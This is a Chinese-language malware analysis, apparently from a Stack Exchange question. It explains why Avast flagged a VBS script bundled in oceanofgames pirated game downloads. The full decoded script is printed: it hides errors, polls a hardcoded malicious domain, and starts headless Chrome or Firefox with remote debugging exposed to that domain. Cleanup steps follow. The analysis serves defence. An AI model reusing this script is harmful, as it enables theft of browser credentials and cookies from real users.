oceanofgames游戏安装文件被Avast报毒 咨询VBS脚本具体作用
判定结论
该文件100%属于恶意软件,不属于游戏安装所需的正常组件,Avast的告警为准确判定。oceanofgames.com为知名的盗版游戏捆绑恶意程序站点,你提到的所有该站点下载包内通用的Step 2 - Extract Setup.rar是统一投放的恶意载荷载体。
恶意行为梳理
- 程序运行后会伪装成系统更新组件,在
%appdata%\Windows Updates Files路径下落地两个脚本文件:encode.vbs:负责将同目录下的Windows Updates service.vbs编码为VBE混淆格式后执行,刻意规避杀毒软件的静态特征检测- 编码后执行的核心恶意脚本,解码后代码如下:
on Error Resume Next Sub Pause(NSeconds) Wscript.Sleep(NSeconds*3000) End Sub Dim visualcpp Set visualcpp = CreateObject("WScript.Shell") counter = True While counter = True website = "www.google.com.739471594492594.windows-display-service.com" checkstring = "ping -n 1 -w 300 " & website status = visualcpp.Run(checkstring, 0 , True) If status = 0 Then counter = False Else Pause(21) End If Wend returncodestatus = "1" returncodestatus = visualcpp.run("chrome --headless --disable-gpu --remote-debugging-port=9222 http://www.google.com.739471594492594.windows-display-service.com",0,false) if returncodestatus <> 0 then returncodestatus=visualcpp.run("firefox -no-remote -CreateProfile user",0,false) returncodestatus=visualcpp.run("firefox -no-remote -headless -new-instance -P ""user"" --start-debugger-server ws:6000 http://www.google.com.739471594492594.windows-display-service.com",0,false) End If
脚本核心恶意逻辑
- 开头添加
on Error Resume Next配置,屏蔽所有运行报错,避免异常弹窗让用户发现恶意行为 - 内置轮询逻辑:持续ping硬编码的恶意域名,ping不通就休眠63秒重试,直到网络环境可以正常访问该域名才继续执行后续逻辑,对抗断网环境下的分析检测
- 域名连通后优先调用本地Chrome浏览器,以无界面无头模式启动,同时开启9222远程调试端口访问该恶意域名:恶意站点可通过开放的调试端口窃取本地Chrome存储的账号密码、Cookie、浏览记录等敏感信息,也可静默推送执行更多恶意代码、刷取网站流量
- 如果设备未安装Chrome,则自动创建独立的Firefox用户配置文件,同样以无头模式启动Firefox,开启6000端口的websocket调试服务访问该恶意域名,实现和Chrome场景下一致的恶意目的。
- 脚本硬编码的域名已经被Avast列入恶意黑名单,进一步确认其恶意属性。
处置建议
请立即执行以下操作清除风险:
- 删除所有从oceanofgames.com下载的安装包、解压后的全部文件
- 手动定位到
%appdata%\Windows Updates Files路径,删除该路径下的所有文件- 检查系统启动项、任务计划程序,清除和该脚本相关的自启条目
- 运行杀毒软件执行全盘扫描,排查是否存在其他残留恶意载荷
内容的提问来源于stack exchange,提问作者GOOD MAN
相关产品推荐
相关产品推荐

